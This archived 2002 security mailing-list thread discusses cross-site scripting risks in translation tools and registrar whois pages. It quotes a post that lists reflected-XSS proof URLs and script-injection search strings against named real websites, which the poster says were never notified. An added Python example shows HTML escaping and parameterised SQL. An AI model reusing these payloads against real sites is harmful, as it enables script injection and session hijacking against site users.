Re: CSS, CSS & let me give you some more CSS

From: M. Burnett (mb@xato.net)
Date: 01/31/02


From: "M. Burnett" <mb@xato.net>
To: <vuln-dev@securityfocus.com>
Date: Thu, 31 Jan 2002 10:06:05 -0700

In the process of translating this French tutorial into English using
babelfish.altavista.com, I noticed that it converted the encoded
characters in the document. Which brings up another potential source
of cross-site scripting attacks via translation and other online
tools. Using a variety of techniques, one could formulate a URL that
appears to be coming from altavista.com but in fact is loading a page
loaded with nefarious code from any site. Similar vulnerabilities
could potentially be found in sites such as HTML validation utilities
or broken link checkers.

I also found several domain name registrars that had whois lookups
that were vulnerable to cross-site scripting. These in particular
could be serious vulnerabilities as some of these registrars allow
login via cookies. By sending a properly crafted URL to the right
person, one could potentially hijack another's domain.

Mark Burnett
www.xato.net

On Tue, 29 Jan 2002 23:25:52 +0100, Frog Frog wrote:
>Nice... I just want to say that there is a tutorial in French about
>cross site scripting : http://balteam.multimania.com/Tuts/css.txt .
>If you have additions or advice, please send them to me... Thx :)
>
>>From: "- phinegeek -" <phine@anonymous.to>
>>To: vuln-dev@securityfocus.com
>>Subject: CSS, CSS & let me give you some more CSS
>>Date: Tue, 29 Jan 2002 00:31:21 -0800
>>
>>A little while back I posted some info on a CSS bug I found on
>>ebay, http://securityfocus.com/archive/82/246275.
>>Just about every site (not joking) you go to has this type of
>>vulnerability, it's nothing new. Luckily, CSS vulns are very easy
>>to fix, after they are discovered.
>>However, you shouldn't have to wait until your site is prefixed
>>with "Cross Site Scripting" on a Bugtraq posting. These types of
>>errors, as well as many other similar (but less threatening) types
>>are the product of careless programming practices.
>>All you need is a method (call it SecureHTML()) that you run all
>>your input through, before it gets displayed back to the user.
>>This method would be used throughout your site in a modularized
>>fashion.
>>Isn't this how we should be doing it anyway???
>>This simple principle can also be used for input that becomes part
>>of an SQL statement (call it SecureSQL()) to guard against SQL
>>injection.
>>Just modularize your code folks and make sure all your developers
>>use the methods when dealing with input.
>>It's really that simple.
>>This is also not new, I guess you could call it prevention?
>>
>>And here's some fun.. a lot of Security issues =]
>>
>>Security Focus: http://securityfocus.com/ (copy and paste the text
>>below in the search box just like it is)
>>CSS OR "><SCRIPT><!-- ..tsk tsk tsk.. --></SCRIPT>"
>>
>>Digital Security:
>>http://www.eeye.com/html/forms/recommend.html?u=eeye.com/>;alert('Digital+Security?');</SCRIPT>
>>
>>Internet Security:
>>http://www.iss.net/search.php?pattern=>alert('Internet+Security?');</script>
>>
>>Linux Security:
>>http://search.linuxsecurity.com/cgi-bin/htsearch?words="><script>alert('Linux+Security?')</script>
>>
>>Macintosh Security:
>>http://www.macintoshsecurity.com/search.php?query="><SCRIPT&#62;alert('Macintosh+Security?')</SCRIPT>
>>
>>Social Security??: http://www.ssa.gov/online/forms.html (copy and
>>paste the text below in the search box just like it is)
>>Social Security <SCRIPT>alert('Social Security?');</SCRIPT>
>>
>>
>>'phine
>>
>>p.s. none of the sites above have been notified.
>>If I were to tell them, I would feel guilty and have to tell the
>>others I know about (too many), then I would have to quit my night
>>job.
>>
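The SecureHTML()/SecureSQL() helpers phinegeek describes above, as an added Python example that is not part of the original thread; the function names, the in-memory table and the sample inputs are constructed for illustration. The round-trip check also covers Mark Burnett's point about intermediaries decoding encoded characters: because the ampersand is encoded too, one round of entity decoding gives back the original text rather than live markup.

```python
import html
import sqlite3

def secure_html(value: str) -> str:
    """SecureHTML(): encode untrusted text before echoing it into a page.
    '&' is encoded as well, so one round of entity decoding (by a browser
    or an intermediary such as a translation service) yields exactly the
    original input again, never a tag."""
    return html.escape(value, quote=True)

def render_search_page(query: str) -> str:
    # Echo the query back the way a search form does, only via secure_html().
    return '<p>Results for: "' + secure_html(query) + '"</p>'

def contains_script_tag(page: str) -> bool:
    # Demo check: did a real <script ...> tag survive into the output?
    return "<script" in page.lower()

def round_trips(value: str) -> bool:
    # One entity decode of the encoded form must give the original text back.
    return html.unescape(secure_html(value)) == value

def build_demo_db() -> sqlite3.Connection:
    # Constructed in-memory table standing in for a site's user database.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO users (name) VALUES (?)", [("alice",), ("o'brien",)])
    conn.commit()
    return conn

def lookup_unsafe(conn: sqlite3.Connection, name: str) -> list:
    # The careless pattern: the input becomes part of the SQL text itself.
    return conn.execute("SELECT name FROM users WHERE name = '" + name + "'").fetchall()

def secure_sql_lookup(conn: sqlite3.Connection, name: str) -> list:
    # SecureSQL(): bind the value as a parameter; the engine never parses it as SQL.
    return conn.execute("SELECT name FROM users WHERE name = ?", (name,)).fetchall()

def unsafe_query_breaks(conn: sqlite3.Connection, name: str) -> bool:
    # True when the concatenated query fails to parse (e.g. on an apostrophe).
    try:
        lookup_unsafe(conn, name)
        return False
    except sqlite3.OperationalError:
        return True

if __name__ == "__main__":
    # Constructed input mirroring the search-box payload quoted in the thread.
    page = render_search_page('"><SCRIPT>alert(\'XSS?\');</SCRIPT>')
    print(page, contains_script_tag(page))
    print(round_trips("<SCRIPT&#62;alert('x')</SCRIPT>"))
    conn = build_demo_db()
    print(secure_sql_lookup(conn, "o'brien"), unsafe_query_breaks(conn, "o'brien"))
```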